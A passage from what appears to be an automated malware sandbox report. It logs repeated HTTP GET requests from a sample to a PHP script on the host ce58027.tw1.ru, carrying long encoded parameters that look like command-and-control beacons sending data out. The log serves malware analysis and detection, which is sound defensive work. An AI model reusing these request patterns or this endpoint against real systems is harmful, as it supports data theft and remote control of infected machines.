0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=QX9JiI6ISMlJ2MwcTOzETMmVWMzYjYhVzMhRDOzATZzADMkZzNhJCLiATYiZ2YyUDNiFjM2QGO3ITYhFmMkF2YjFmZ5EWN2YDZ0QTNkBDZlVjI6ICNkZjMzMGO2UjZkF2N1cjZjRmZ4M2MwYmN5IGO2MGM4ICLiMjNxAzMkVDNiZmZzYzN4YTMkVWNlNTNlRmNxUjMwEGZzcDZzkjYlNjI6ICNkJ2YklTMwIjMwIjNkhzMkZDMhZWZzMGMkhjN2QGZmJyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?sfxSMm=rxb3wPgb0HPV&2e6ea3aaeac867bc064a534e31e365d4=6f9cfd298d9789ebd2787a0e63b0d086&0f0872650c0ba62ba5efb31d4a3a3070=QNkVjYlNmNihDZkJjM3IWO5QDZ4Y2NiV2NxIDOzYmYyEWNzYGMlRjM&sfxSMm=rxb3wPgb0HPV HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&1b4307a464f9201736c9c444186ee18b=0VfiIiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiI3E2YwMDOjlDN4EWYxYjMmRTM3AzNzkzM4UjZ2IWMzMGZ2E2NyATMmJiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=QX9JiI6ISMlJ2MwcTOzETMmVWMzYjYhVzMhRDOzATZzADMkZzNhJCLiATYiZ2YyUDNiFjM2QGO3ITYhFmMkF2YjFmZ5EWN2YDZ0QTNkBDZlVjI6ICNkZjMzMGO2UjZkF2N1cjZjRmZ4M2MwYmN5IGO2MGM4ICLiMjNxAzMkVDNiZmZzYzN4YTMkVWNlNTNlRmNxUjMwEGZzcDZzkjYlNjI6ICNkJ2YklTMwIjMwIjNkhzMkZDMhZWZzMGMkhjN2QGZmJyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&04d4a5280b397c7cb744792a503cb48e=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiI3E2YwMDOjlDN4EWYxYjMmRTM3AzNzkzM4UjZ2IWMzMGZ2E2NyATMmJiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&1b4307a464f9201736c9c444186ee18b=QX9JSUNJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIzMWZ1czNwYjZ4cjN5gTY0U2NjVmM4IDZllDN0QjYkRDNmFmMmRWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlk